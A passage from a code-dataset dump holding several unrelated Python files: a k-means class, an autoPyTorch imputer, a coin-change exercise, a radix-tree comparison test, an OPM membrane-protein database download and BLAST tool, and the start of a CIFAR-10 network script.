corresponding to some measure of fitness,\n # generally the best of the results from executing the algorithm n_init times.\n # You will want to return the 'best' labels and centroids by this measure.\n\n return best_assignment, best_centroids, best_inertia\n\n\n# The code below is completed for you.\n# You may modify it as long as changes are noted in the comments.\n\nclass KMeans(SuperCluster):\n \"\"\"\n Parameters\n ----------\n n_clusters : int, optional, default: 8\n The number of clusters to form as well as the number of\n centroids to generate.\n init : {'random', 'k-means++', 'global'}\n Method for initialization, defaults to 'random'.\n algorithm : {'lloyds', 'hartigans'}\n Method for determing algorithm, defaults to 'lloyds'.\n n_init : int, default: 1\n Number of time the k-means algorithm will be run with different\n centroid seeds. The final results will be the best output of\n n_init consecutive runs in terms of inertia.\n max_iter : int, default: 300\n Maximum number of iterations of the k-means algorithm for a\n single run.\n csv_path : str, default: None\n Path to file for dataset csv\n keep_dataframe : bool, default: True\n Hold on the results pandas DataFrame generated after each run.\n Also determines whether to use pandas DataFrame as primary internal data state\n keep_X : bool, default: True\n Hold on the results generated after each run in a more generic array-type format\n Use these values if keep_dataframe is False\n verbose: bool, default: False\n Optional log level\n \"\"\"\n\n def __init__(self, n_clusters=3, init='random', algorithm='lloyds', n_init=1, max_iter=300,\n csv_path=None, keep_dataframe=True, keep_X=True, verbose=False):\n self.n_clusters = n_clusters\n self.init = init\n self.algorithm = algorithm\n self.n_init = n_init\n self.max_iter = max_iter\n self.csv_path = csv_path\n self.keep_dataframe = keep_dataframe\n self.keep_X = keep_X\n self.verbose = verbose\n\n # X is an array of shape (n_samples, n_features)\n def fit(self, X):\n if self.keep_X:\n self.X = X\n start_time = time.time()\n self.labels, self.centroids, self.inertia = \\\n k_means(X, n_clusters=self.n_clusters, init=self.init, algorithm=self.algorithm,\n n_init=self.n_init, max_iter=self.max_iter, verbose=self.verbose)\n print(self.init + \" k-means finished in %s seconds\" % (time.time() - start_time))\n return self\n\n def show_plot(self):\n if self.keep_dataframe and hasattr(self, 'DF'):\n _plot_kmeans_(df=self.DF)\n elif self.keep_X:\n _plot_kmeans_(X=self.X, labels=self.labels, centroids=self.centroids)\n else:\n print('No data to plot.')\n\n def save_plot(self, name='kmeans_plot'):\n if self.keep_dataframe and hasattr(self, 'DF'):\n _plot_kmeans_(df=self.DF, save=True, n=name)\n elif self.keep_X:\n _plot_kmeans_(X=self.X, labels=self.labels,\n centroids=self.centroids, save=True, n=name)\n else:\n print('No data to plot.')\n","sub_path":"ClusterUtils/KMeans.py","file_name":"KMeans.py","file_ext":"py","file_size_in_byte":12046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"274119951","text":"from typing import Any, Dict, List, Optional, Union\n\nfrom ConfigSpace.configuration_space import ConfigurationSpace\nfrom ConfigSpace.hyperparameters import (\n CategoricalHyperparameter\n)\n\nimport numpy as np\n\nfrom sklearn.impute import SimpleImputer as SklearnSimpleImputer\n\nfrom autoPyTorch.datasets.base_dataset import BaseDatasetPropertiesType\nfrom autoPyTorch.pipeline.components.preprocessing.tabular_preprocessing.imputation.base_imputer import BaseImputer\nfrom autoPyTorch.utils.common import HyperparameterSearchSpace, add_hyperparameter\n\n\nclass SimpleImputer(BaseImputer):\n \"\"\"\n Impute missing values for categorical columns with '!missing!'\n (In case of numpy data, the constant value is set to -1, under\n the assumption that categorical data is fit with an Ordinal Scaler)\n \"\"\"\n\n def __init__(self,\n random_state: Optional[Union[np.random.RandomState, int]] = None,\n numerical_strategy: str = 'mean',\n categorical_strategy: str = 'most_frequent'):\n super().__init__()\n self.random_state = random_state\n self.numerical_strategy = numerical_strategy\n self.categorical_strategy = categorical_strategy\n\n def fit(self, X: Dict[str, Any], y: Any = None) -> BaseImputer:\n \"\"\"\n The fit function calls the fit function of the underlying model\n and returns the transformed array.\n Args:\n X (np.ndarray): input features\n y (Optional[np.ndarray]): input labels\n\n Returns:\n instance of self\n \"\"\"\n self.check_requirements(X, y)\n categorical_columns = X['dataset_properties']['categorical_columns'] \\\n if isinstance(X['dataset_properties']['categorical_columns'], List) else []\n if len(categorical_columns) != 0:\n if self.categorical_strategy == 'constant_!missing!':\n self.preprocessor['categorical'] = SklearnSimpleImputer(strategy='constant',\n # Train data is numpy\n # as of this point, where\n # Ordinal Encoding is using\n # for categorical. Only\n # Numbers are allowed\n # fill_value='!missing!',\n fill_value=-1,\n copy=False)\n else:\n self.preprocessor['categorical'] = SklearnSimpleImputer(strategy=self.categorical_strategy,\n copy=False)\n numerical_columns = X['dataset_properties']['numerical_columns'] \\\n if isinstance(X['dataset_properties']['numerical_columns'], List) else []\n if len(numerical_columns) != 0:\n if self.numerical_strategy == 'constant_zero':\n self.preprocessor['numerical'] = SklearnSimpleImputer(strategy='constant',\n fill_value=0,\n copy=False)\n else:\n self.preprocessor['numerical'] = SklearnSimpleImputer(strategy=self.numerical_strategy, copy=False)\n\n return self\n\n @staticmethod\n def get_hyperparameter_search_space(\n dataset_properties: Optional[Dict[str, BaseDatasetPropertiesType]] = None,\n numerical_strategy: HyperparameterSearchSpace = HyperparameterSearchSpace(hyperparameter='numerical_strategy',\n value_range=(\"mean\", \"median\",\n \"most_frequent\",\n \"constant_zero\"),\n default_value=\"mean\",\n ),\n categorical_strategy: HyperparameterSearchSpace = HyperparameterSearchSpace(\n hyperparameter='categorical_strategy',\n value_range=(\"most_frequent\",\n \"constant_!missing!\"),\n default_value=\"most_frequent\")\n ) -> ConfigurationSpace:\n cs = ConfigurationSpace()\n assert dataset_properties is not None, \"To create hyperparameter search space\" \\\n \", dataset_properties should not be None\"\n if len(dataset_properties['numerical_columns']) \\\n if isinstance(dataset_properties['numerical_columns'], List) else 0 != 0:\n add_hyperparameter(cs, numerical_strategy, CategoricalHyperparameter)\n\n if len(dataset_properties['categorical_columns']) \\\n if isinstance(dataset_properties['categorical_columns'], List) else 0 != 0:\n add_hyperparameter(cs, categorical_strategy, CategoricalHyperparameter)\n\n return cs\n\n @staticmethod\n def get_properties(dataset_properties: Optional[Dict[str, BaseDatasetPropertiesType]] = None\n ) -> Dict[str, Union[str, bool]]:\n return {\n 'shortname': 'SimpleImputer',\n 'name': 'Simple Imputer',\n 'handles_sparse': True\n }\n","sub_path":"autoPyTorch/pipeline/components/preprocessing/tabular_preprocessing/imputation/SimpleImputer.py","file_name":"SimpleImputer.py","file_ext":"py","file_size_in_byte":5707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"580910266","text":"# python3\n\n\ndef money_change(money):\n assert 0 <= money <= 10 ** 3\n coins = [10,5,1]\n i = 0\n j = 0\n while(money > 0):\n if coins[i] > money:\n i += 1\n else:\n j += 1\n money -= coins[i]\n return j\n\n\n\n\nif __name__ == '__main__':\n input_money = int(input())\n print(money_change(input_money))\n","sub_path":"A/money_change.py","file_name":"money_change.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"182777058","text":"#!/usr/bin/env python3\n\n#\n# bst_radix.py\n#\n# python-training/algorithms (c) 2017 by Franco Masotti\n# \n#\n# To the extent possible under law, the person who associated CC0 with\n# python-training/algorithms has waived all copyright and related or \n# neighboring rights to python-training/algorithms. This software is \n# distributed without any warranty.\n#\n# You should have received a copy of the CC0 legalcode along with this\n# software. If not, see .\n\nimport random\nimport timeit\nfrom bst import Bst, BstNode\n\n# From exercise 12-2\n#\n# A radix tree for an alphabet of |sigma| = 2 (two symbols)\n# implies that all the possible strings can be originated by a binary tree.\nSIGMA = ['0', '1']\n\n\n###\n### NOTE: There is no bst here. It's just a proof of concept.\n###\n\n# a < b?\ndef rule_1(a,b,p,q):\n j = min(p,q)\n if a[0:j-1] == b[0:j-1] and a[j] < b[j]:\n return True\n else:\n return False\n\ndef rule_2(a,b,p,q):\n if p < q and a[0:p] == b[0:p]:\n return True\n else:\n return False\n\ndef a_lt_b(a,b,p,q):\n if rule_1(a,b,p,q) or rule_2(a,b,p,q):\n return True\n else:\n return False\n\n# Same examples as in the book.\ndef test_poc():\n a1 = \"10100\"\n b1 = \"10110\"\n p1 = 3\n q1 = 3\n\n a2 = \"10100\"\n b2 = \"101000\"\n p2 = len(a2)-1\n q2 = len(b2)-1\n\n assert a_lt_b(a1,b1,p1,q1) and a_lt_b(a2,b2,p2,q2)\n\n# Test time for both implementations of insert\n# Assert that time.insert_improve <= time.insert.\n# This should be especially true if all the inserted keys are eual to\n# eachother.\ndef test(tests,verbose=False):\n test_poc()\n\n# Run n tests and check that the n lists returned are all equal to each other\n# knowing that they have been generated randomly, they have the same size\n# and the same unique keys. This means that the MAX - MIN + 1 numbers generated\n# above are instered in the data structure randomly.\nif __name__ == '__main__':\n TESTS = 50\n\n test(TESTS)\n print (\"All tests passed\")\n\n","sub_path":"algorithms/bst_radix.py","file_name":"bst_radix.py","file_ext":"py","file_size_in_byte":2079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"167032992","text":"#!/usr/bin/env python\nfrom __future__ import print_function, division\n\nimport urllib\nimport sys, os, re\nimport argparse\nimport json\nimport math\nimport csv\nimport subprocess\n\nimport Bio.PDB\ntry: CODE = Bio.PDB.protein_letters_3to1\nexcept AttributeError: CODE = Bio.PDB.to_one_letter_code\n\n#TODO: move common classes out\nimport pdbtm_dbtool\n\nclass OPM(object):\n\tdef __init__(self):\n\t\tpass\n\n\ndef _scroll_json(url):\n\t''' Collects all pages for a multipage JSON '''\n\tout = []\n\tf = urllib.urlopen(url)\n\traw = f.read()\n\tobj = json.loads(raw)\n\ttotal_objects = obj['total_objects']\n\tpage_end = obj['page_end']\n\tpage_num = obj['page_num']\n\tpage_size = obj['page_size']\n\n\tout += obj['objects']\n\n\tfor i in range(page_num+1, int(math.ceil(total_objects/page_size))):\n\t\tf = urllib.urlopen(url + '?pageNum={}'.format(i))\n\t\traw = f.read()\n\t\tobj = json.loads(raw)\n\t\tout += obj['objects']\n\treturn json.dumps(out)\ndef get_database(prefix='.'):\n\t''' (Deprecated) Fetched the OPM database dump '''\n\tprint('Fetching database...', file=sys.stderr)\n\twith open('{}/opmall.json'.format(prefix), 'w') as f: pass\n\n\tfor table in ('types', 'classtypes', 'superfamilies', 'families', 'primary_structures', 'structure_subunits'):\n\t\tdata = _scroll_json('https://lomize-group-opm.herokuapp.com/{}'.format(table))\n\t\t\n\t\t#db = urllib.urlopen('https://lomize-group-opm.herokuapp.com/{}'.format(table))\n\t\twith open('{}/opmall.json'.format(prefix), 'a') as f: \n\t\t\tf.write('// {}\\n'.format(table))\n\t\t\tf.write(data)\n\t\t\tf.write('\\n')\n\t#print('Saving database...', file=sys.stderr)\n\texit()\n\ndef build_database(fn, prefix):\n\t''' Unpacked the OPM database and converted it into the ASSIGNMENTS.TSV '''\n\tprint('Unpacking database...', file=sys.stderr)\n\n\t#db = {'atlas':[], 'citation':[], 'class':[], 'classification':[], 'family':[], 'history':[], 'membrane':[], 'protein':[], 'relatedproteins':[], 'relatedproteinstemp':[], 'relatedproteinstempnew':[], 'species':[], 'subunits':[], 'superfamily':[], 'type':[]}\n\tdb = {'atlas':[], 'citation':[], 'class':[], 'classification':[], 'family':[], 'history':[], 'membrane':[], 'protein':[], 'relatedproteins':[], 'relatedproteinstemp':[], 'relatedproteinstempnew':[], 'species':[], 'subunits':[], 'superfamily':[], 'type':[]}\n\twith open(fn) as f:\n\t\tn = 0\n\t\tfor l in f:\n\t\t\tif not l.startswith('['): continue\n\t\t\tdb[sorted(db)[n]] = json.loads(l)\n\t\t\tn += 1\n\n\tproteins = {}\n\tfor protein in db['protein']:\n\t\tpdbid = protein['pdbid']\n\t\tproteins[pdbid] = pdbtm_dbtool.PDB()\n\t\tproteins[pdbid].label = pdbid\n\n\trelated_proteins = {}\n\tparent_proteins = {}\n\tfor relprot in db['relatedproteins']:\n\t\trel_pdbid = relprot['pdbid']\n\t\tpar_pdbid = relprot['protein_pdbid']\n\n\t\tif par_pdbid in proteins and rel_pdbid in proteins: pass\n\t\telif par_pdbid in proteins:\n\t\t\tparent_proteins[rel_pdbid] = par_pdbid\n\t\t\ttry: related_proteins[par_pdbid].append(rel_pdbid)\n\t\t\texcept KeyError: related_proteins[par_pdbid] = [rel_pdbid]\n\t\t\t#proteins[rel_pdbid] = pdbtm_dbtool.PDB()\n\t\t\t#proteins[rel_pdbid].label = rel_pdbid\n\t\t#necessary because 1ym6 is misannotated as being a relative of 1okc\n\t\telse:\n\t\t\tparent_proteins[par_pdbid] = rel_pdbid\n\t\t\ttry: related_proteins[rel_pdbid].append(par_pdbid)\n\t\t\texcept KeyError: related_proteins[rel_pdbid] = [par_pdbid]\n\t\t\t#proteins[par_pdbid] = pdbtm_dbtool.PDB()\n\t\t\t#proteins[par_pdbid].label = par_pdbid\n\n\t#print(related_proteins['1ym6'])\n\t#for p in related_proteins: print(p, related_proteins[p])\n\t#for p in proteins: print(p)\n\t#exit()\n\n\tprint('Writing assignments to {}/ASSIGNMENTS.TSV...'.format(prefix), file=sys.stderr)\n\twriteme = []\n\tfor subunit in db['subunits']:\n\t\tpdbid = subunit['pdbid']\n\t\tletter = subunit['letter']\n\t\t#print(subunit['pdbid'], subunit['letter'], subunit['pdbid'] in proteins)\n\t\tif pdbid not in proteins:\n\t\t\t#necessary because 2iqo_? is an orphaned subunit\n\t\t\tif pdbid in parent_proteins: continue\n\t\t\telse: proteins[pdbid] = pdbtm_dbtool.PDB()\n\t\tchain = pdbtm_dbtool.Chain(label=letter, parent=proteins[pdbid])\n\n\t\tproteins[pdbid].chains.append(chain)\n\t\tsegments = subunit['segment']\n\t\tspans = re.split(r'\\),?\\s*[0-9][0-9]?\\s*\\(?', segments)\n\t\tsegstr = ''\n\t\ttrouble = '2he6'\n\t\tfor i in spans:\n\t\t\ts = i\n\t\t\tif pdbid == trouble: print('start:', s)\n\t\t\ts = re.sub(r'\\n[A-Za-z]+', '', s)\n\t\t\tif pdbid == trouble: print(s)\n\t\t\ts = re.sub(r'\\r?\\n', '', s)\n\t\t\tif pdbid == trouble: print(s)\n\t\t\ts = re.sub(r'^\\s*[0-9]+\\(\\s*', '', s)\n\t\t\tif pdbid == trouble: print(s)\n\t\t\ts = re.sub(r'\\s+', '', s)\n\t\t\tif pdbid == trouble: print(s)\n\t\t\ts = re.sub(r'[0-9]+\\(', '', s)\n\t\t\tif pdbid == trouble: print(s)\n\t\t\ts = re.sub(r'\\)[^\\-]*', '', s)\n\t\t\tif pdbid == trouble: print(s)\n\t\t\tif s.strip(): segstr += s + ','\n\t\t\tif pdbid == trouble: print('final:', s)\n\t\t#print(segments)\n\t\t#print(segstr[:-1])\n\t\t#print(sorted(db))\n\t\twriteme.append('{}_{}\\t{}\\n'.format(pdbid, letter, segstr[:-1]))\n\t\tif pdbid == trouble: print(writeme[-1])\n\t\tif pdbid in related_proteins:\n\t\t\tfor relpdbid in related_proteins[pdbid]:\n\t\t\t\twriteme.append('{}_{}\\t{}\\n'.format(relpdbid, letter, segstr[:-1]))\n\n\tlast100 = []\n\twith open('{}/ASSIGNMENTS.TSV'.format(prefix), 'w') as f:\n\t\tfor s in sorted(writeme):\n\t\t\tif not last100: pass\n\t\t\telif hash(s) in last100: continue\n\n\t\t\tf.write(s)\n\t\t\tlast100.append(hash(s))\n\t\t\tif len(last100) > 100: last100.pop(0)\n\ndef correct_spans(segments, pdbid=None):\n\t''' Corrected some of the easier formatting issues. TODO: handle re-entrants properly '''\n\n\tspans = re.split(r'\\),?\\s*[0-9][0-9]?\\s*\\(?', segments)\n\tsegstr = ''\n\ttrouble = '2he6'\n\tfor i in spans:\n\t\ts = i\n\t\tif pdbid == trouble: print('start:', s)\n\t\ts = re.sub(r'\\n[A-Za-z]+', '', s)\n\t\tif pdbid == trouble: print(s)\n\t\ts = re.sub(r'\\r?\\n', '', s)\n\t\tif pdbid == trouble: print(s)\n\t\ts = re.sub(r'^\\s*[0-9]+\\(\\s*', '', s)\n\t\tif pdbid == trouble: print(s)\n\t\ts = re.sub(r'\\s+', '', s)\n\t\tif pdbid == trouble: print(s)\n\t\ts = re.sub(r'[0-9]+\\(', '', s)\n\t\tif pdbid == trouble: print(s)\n\t\ts = re.sub(r'\\)[^\\-]*', '', s)\n\t\tif pdbid == trouble: print(s)\n\t\tif s.strip(): segstr += s + ','\n\t\tif pdbid == trouble: print('final:', s)\n\treturn segstr[:-1]\n\n\twriteme.append('{}_{}\\t{}\\n'.format(pdbid, letter, segstr[:-1]))\n\ndef process_opm_csv(outdir):\n\t''' Parsed OPM CSVs '''\n\tif not os.path.isdir(outdir): os.mkdir(outdir)\n\n\ttry: urlopen = urllib.urlopen\n\texcept AttributeError: urlopen = urllib.request.urlopen\n\n\tif 0:\n\t\tinf = urlopen('https://lomize-group-opm.herokuapp.com/structure_subunits?fileFormat=csv')\n\t\twith open('{}/opm_subunits.csv'.format(outdir), 'w') as outf:\n\t\t\toutf.write(inf.read())\n\t\tinf.close()\n\n\tspans = {}\n\twith open('{}/opm_subunits.csv'.format(outdir)) as f:\n\t\tcsv_reader = csv.reader(f)\n\t\tfor row in csv_reader:\n\t\t\tpdbid = re.findall('[0-9a-zA-Z]+', row[5])[0].lower()\n\t\t\tchain = row[6]\n\t\t\tsegments = row[11]\n\t\t\tprint(correct_spans(segments, pdbid=pdbid))\n\t\n\ndef process_opm_scroll_primaries(outdir, force=False):\n\t''' Processed primary structure records from OPM, linking secondary representations to their primaries \n\n\tTODO: Put everything in a class and break up the easily decoupled steps into separate methods\n\t'''\n\tif not os.path.isdir(outdir): os.mkdir(outdir)\n\n\ttry: urlopen = urllib.urlopen\n\texcept AttributeError: urlopen = urllib.request.urlopen\n\n\tif force or not os.path.isfile('{}/primary_structures.json'.format(outdir)):\n\t\tprimary_structures = _scroll_json('https://lomize-group-opm.herokuapp.com/primary_structures')\n\t\twith open('{}/primary_structures.json'.format(outdir), 'w') as f:\n\t\t\tf.write(primary_structures)\n\telse: print('primary_structures.json already exists, skipping download')\n\n\tidlist = []\n\twith open('{}/primary_structures.json'.format(outdir)) as f:\n\t\tstruclist = json.loads(f.read())\n\t\tfor struc in struclist: idlist.append(struc['id'])\n\t\n\tprimary_structures = {}\n\tif force or not os.path.isfile('{}/indiv_structures.tsv'.format(outdir)):\n\t\twith open('{}/indiv_structures.tsv'.format(outdir), 'w') as f:\n\t\t\tfor n, opmid in enumerate(idlist):\n\t\t\t\turl = urlopen('https://lomize-group-opm.herokuapp.com/primary_structures/{}'.format(opmid))\n\t\t\t\t#print(json.loads(url.read()))\n\t\t\t\traw = url.read()\n\t\t\t\tobj = json.loads(raw)\n\t\t\t\tprimary_structures[obj['pdbid']] = obj\n\t\t\t\tf.write('{}\\t{}\\n'.format(obj['pdbid'], raw))\n\n\t\t\t\tif not (n % 100): \n\t\t\t\t\tf.flush()\n\t\t\t\t\tprint('Committed {}/{} individual structure records to disk'.format(n, len(idlist)))\n\telse: print('indiv_structures.json already exists, skipping download')\n\n\tsecondary_representations = {}\n\twith open('{}/indiv_structures.tsv'.format(outdir)) as f:\n\t\tfor l in f:\n\t\t\tif not l.strip(): continue\n\t\t\telif l.lstrip().startswith('#'): continue\n\n\t\t\tpdbid, raw = l.split('\\t')\n\t\t\tobj = json.loads(raw)\n\t\t\tprimary_structures[pdbid] = obj\n\t\t\tif obj['secondary_representations']:\n\t\t\t\tsecondary_representations[pdbid] = obj['secondary_representations']\n\n\tfor primaryid in secondary_representations:\n\t\tfor secondaryobj in secondary_representations[primaryid]:\n\t\t\tsecondaryid = secondaryobj['pdbid']\n\t\t\tif secondaryid in primary_structures: continue\n\n\t\t\telse: \n\t\t\t\tprimary_structures[secondaryid] = primary_structures[primaryid].copy()\n\t\t\t\tprimary_structures[secondaryid]['pdbid'] = secondaryid\n\t\t\t\t#print(primary_structures[primaryid]['pdbid'], primary_structures[secondaryid]['pdbid'])\n\n\tif force or not os.path.isfile('{}/ASSIGNMENTS.TSV'.format(outdir)):\n\t\twith open('{}/ASSIGNMENTS.TSV'.format(outdir), 'w') as f:\n\t\t\tfor pdbid in sorted(primary_structures):\n\t\t\t\tfor subunit in primary_structures[pdbid]['subunits']:\n\t\t\t\t\tchain = subunit['protein_letter']\n\t\t\t\t\tsegment = subunit['segment']\n\n\t\t\t\t\tspans = correct_spans(segment, pdbid=pdbid)\n\t\t\t\t\tf.write('{}_{}\\t{}\\n'.format(pdbid.lower(), chain, spans))\n\telse: print('ASSIGNMENTS.TSV already exists, skipping rebuild')\n\n\tprint('Mapping secondaries back to primaries')\n\tsec2prim = {}\n\tfor primaryid in secondary_representations:\n\t\tfor secobj in secondary_representations[primaryid]:\n\t\t\tsec2prim[secobj['pdbid']] = primaryid\n\n\n\tif force or not os.path.isfile('{}/all_pdbs.tar.gz'.format(outdir)):\n\t\tsubprocess.call(['wget', '-O', '{}/all_pdbs.tar.gz'.format(outdir), 'https://storage.googleapis.com/opm-assets/pdb/tar_files/all_pdbs.tar.gz'])\n\telse: print('Found all_pdbs.tar.gz, skipping redownload')\n\n\tif force or not os.path.isdir('{}/pdb'.format(outdir)): \n\t\tif not os.path.isdir('{}/pdb'.format(outdir)): os.mkdir('{}/pdb'.format(outdir))\n\n\t\tsubprocess.call(['tar', 'xzf', '{}/all_pdbs.tar.gz'.format(outdir), '-C', outdir])\n\t\t#f_remote = urlopen('https://storage.googleapis.com/opm-assets/pdb/tar_files/all_pdbs.tar.gz', 'rb')\n\t\t#with open('{}/all_pdbs.tar.gz'.format(outdir), 'wb') as f_local:\n\t\t#\tf_local.write(f_remote.read())\n\telse: print('Found pdb subdirectory, skipping reextraction')\n\n\n\tif not os.path.isdir('{}/sequences'.format(outdir)): os.mkdir('{}/sequences'.format(outdir))\n\n\n\tsequences = {}\n\tif not os.path.isdir('{}/sequences'.format(outdir)): os.mkdir('{}/sequences'.format(outdir))\n\n\tprint('Counting relevant PDB subunits')\n\trelevant_pdbc = set()\n\tfor pdbid in sorted(primary_structures):\n\t\tfor subunit in primary_structures[pdbid]['subunits']:\n\t\t\tchain = subunit['protein_letter']\n\t\t\tpdbc = '{}_{}'.format(pdbid.upper(), chain)\n\t\t\trelevant_pdbc.add(pdbc)\n\n\tprint('Extracting {} sequences. This may take some time'.format(len(primary_structures)))\n\tfor n, pdbid in enumerate(sorted(primary_structures)):\n\t\tif not n % 500: print('Extracted {} sequences so far'.format(n))\n\t\tfn = '{}/pdb/{}.pdb'.format(outdir, pdbid.lower())\n\t\tif not os.path.isfile(fn):\n\t\t\tif pdbid in sec2prim: fn = '{}/pdb/{}.pdb'.format(outdir, sec2prim[pdbid].lower())\n\t\t\telse: \n\t\t\t\tsubprocess.call(['wget', '-O', fn + '.gz', 'https://files.rcsb.org/download/{}.pdb.gz'.format(pdbid)])\n\t\t\t\tsubprocess.call(['gunzip', fn + '.gz'])\n\n\t\tdone_seq = True\n\t\tfor subunit in primary_structures[pdbid]['subunits']:\n\t\t\tchain = subunit['protein_letter']\n\n\t\t\tif force or not os.path.isfile('{}/sequences/{}_{}.fa'.format(outdir, pdbid, chain)):\n\t\t\t\tdone_seq = False\n\t\t\t\tbreak\n\t\tif done_seq: continue\n\n\t\tif os.path.isfile(fn):\n\t\t\twith open(fn) as f:\n\t\t\t\tpdbseq = extract_pdb_sequences(f)\n\t\t\tfor chain in pdbseq:\n\t\t\t\tpdbc = '{}_{}'.format(pdbid.upper(), chain)\n\t\t\t\tif pdbc not in relevant_pdbc: continue\n\n\t\t\t\toutfn = '{}/sequences/{}_{}.fa'.format(outdir, pdbid.upper(), chain)\n\t\t\t\tif force or not os.path.isfile(outfn):\n\t\t\t\t\twith open(outfn, 'w') as f:\n\t\t\t\t\t\tf.write('>{}_{}\\n{}'.format(pdbid.upper(), chain, pdbseq[chain]))\n\n\n\ttcdb2pdb = {}\n\n\tprint('Evaluating sequence quality')\n\tskipme = set()\n\tif os.path.isfile('{}/bad_seqlist'.format(outdir)): \n\t\twith open('{}/bad_seqlist'.format(outdir)) as f:\n\t\t\tfor l in f:\n\t\t\t\tif not l.strip(): continue\n\t\t\t\telif l.lstrip().startswith('#'): continue\n\t\t\t\tskipme.add(l.strip())\n\n\tskipf = open('{}/bad_seqlist'.format(outdir), 'w')\n\tprint('BLASTing sequences for {} structures against TCDB. This could take a while.'.format(len(primary_structures)))\n\tfor n, pdbid in enumerate(sorted(primary_structures)):\n\t\tif not n % 500: print('BLASTed sequences for {} structures so far'.format(n))\n\t\tfor subunit in primary_structures[pdbid]['subunits']:\n\t\t\tchain = subunit['protein_letter']\n\t\t\tpdbc = '{}_{}'.format(pdbid.upper(), chain)\n\n\t\t\tfn = '{}/sequences/{}.fa'.format(outdir, pdbc)\n\n\t\t\tif skipme and (pdbc in skipme): continue\n\t\t\telse:\n\t\t\t\tif os.path.isfile(fn):\n\t\t\t\t\twith open(fn) as f:\n\t\t\t\t\t\tif is_low_quality_sequence(f.read()): \n\t\t\t\t\t\t\tskipf.write(pdbc + '\\n')\n\t\t\t\t\t\t\tcontinue\n\t\t\t\t\ttcid = quickblast(fn, expect=1e-5, ident=0.95)\n\t\t\t\t\tif tcid: \n\t\t\t\t\t\ttry: tcdb2pdb[tcid].append(pdbc)\n\t\t\t\t\t\texcept KeyError: tcdb2pdb[tcid] = [pdbc]\n\n\tif force or not os.path.isfile('{}/tcmap.tsv'.format(outdir)):\n\t\twith open('{}/tcmap.tsv'.format(outdir), 'w') as f:\n\t\t\tline = ''\n\t\t\tfor tcid in sorted(tcdb2pdb):\n\t\t\t\tline += tcid + '\\t'\n\t\t\t\tfor pdb in sorted(tcdb2pdb[tcid]):\n\t\t\t\t\tline += pdb + ','\n\t\t\tf.write(line[:-1] + '\\n')\n\telse: print('OPM-specific tcmap found, skipping remapping')\n\t\t\t\t\n\ndef extract_pdb_sequences(f):\n\t''' Grabs sequences from the ATOM records in a PDB file '''\n\tsequences = {}\n\tfor l in f:\n\t\tif not l.strip(): continue\n\t\telif not l.startswith('ATOM'): continue\n\t\tif l[13:15] != 'CA': continue\n\t\ttry: resn = CODE[l[17:20]]\n\t\texcept KeyError: continue\n\t\t#resi = l[22:26]\n\t\tchain = l[21]\n\t\tif not chain.strip(): chain = 'A'\n\n\t\ttry: sequences[chain] += resn\n\t\texcept KeyError: sequences[chain] = resn\n\treturn sequences\n\t\t\ndef is_low_quality_sequence(fasta):\n\t''' Heuristic for a sequence being too incomplete to even BLAST '''\n\tseq = re.sub('[^A-Za-z*]', '', fasta[fasta.find('\\n'):])\n\tif seq.count('X') > (len(seq)*.75): return True\n\telif len(seq) < 20: return True\n\treturn False\n\n\ndef quickblast(fn, expect=1e-5, ident=0.95):\n\t''' BLAST a sequence against TCDB. Requires that the TCDB BLAST database be somewhere in $BLASTDB '''\n\tout = subprocess.check_output(['blastp', '-db', 'tcdb', '-outfmt', '6', '-evalue', str(expect), '-max_target_seqs', '1', '-query', fn])\n\tif not out.strip(): return None\n\n\trow = out.split('\\t')\n\te = float(row[10])\n\ti = row[2]\n\tacc = row[1]\n\n\n\tif i >= ident: return acc\n\telif e <= expect: return acc\n\telse: return None\n\n\ndef fetch_seq(pdbc):\n\t''' Grabs a sequence from PDBAA '''\n\tp = subprocess.Popen(['blastdbcmd', '-db', 'pdbaa', '-entry', pdbc, '-target_only'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\tout, err = p.communicate()\n\n\treturn out\n\nif __name__ == '__main__':\n\n\tparser = argparse.ArgumentParser(description='Manages OPM databases. Automatically fetches the OPM database if no options are specified. Run without any arguments, opm_dbtool will retrieve the OPM database, store i in opm, and unpack it.')\n\n\tparser.add_argument('directory', nargs='?', default='opm', help='directory to store database in')\n\tparser.add_argument('-f', '--force-refresh', action='store_true', help='force overwrite of existing database. Functionally equivalent to removing the old database and rerunning.')\n\n\targs = parser.parse_args()\n\n\tprocess_opm_scroll_primaries(outdir=args.directory, force=args.force_refresh)\n","sub_path":"opm_dbtool.py","file_name":"opm_dbtool.py","file_ext":"py","file_size_in_byte":15867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"11018256","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 27 01:35:03 2017\n\n@author: wuzhenglin\n\"\"\"\n#==============================================================================\n# optimize the \"DNN pro\" \n# with softmax and lasso\n#\n# Dataset is cifar-10(not download)\n#==============================================================================\nimport tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport cPickle as pickle\n\n#lambda = 0.5\n\nAlpha = 0.5\n\ndef unpickle(filename):\n with open(filename) as f:\n data = pickle.load(f)\n return data\n\ndef onehot(labels):\n n_sample = len(labels)\n n_class = max(labels) + 1\n onehot_labels = np.zeros((n_sample, n_class))\n onehot_labels[np.arange(n_sample), labels] = 1\n \n return onehot_lables\n\ndata1 = unpickle('cifar-10-batches-py/data_batch_1')\ndata2 = unpickle('cifar-10-batches-py/data_batch_2')\ndata3 = unpickle('cifar-10-batches-py/data_batch_3')\ndata4 = unpickle('cifar-10-batches-py/data_batch_4')\ndata5 = unpickle('cifar-10-batches-py/data_batch_5')\ntest = unpickle('cifar-10-batches-py/test_batch')\n\nx_train = np.concatenate((data1['data'], data2['data'], data3['data'], \n data4['data'], data5['data']), axis=0)\nlabel = np.concatenate((data1['labels'], data2['labels'], data3['labels'], \n data4['labels'], data5['labels']), axis=0)\ny_train = onehot(label)\n\nX_test = test['data']\ny_test = onehot(test['labels'])\n\nlearning_rate = 0.001\ntraining_epochs = 500\nbatch_size = 500\ndisplay_step = 1\nn_sample = x_train.shape[0]\n\nn_input = x_train.shape[1]\nn_class = y_train.shape[1]\n\nn_hidden_1 = 1024\nn_hidden_2 = 1024\nn_hidden_3 = 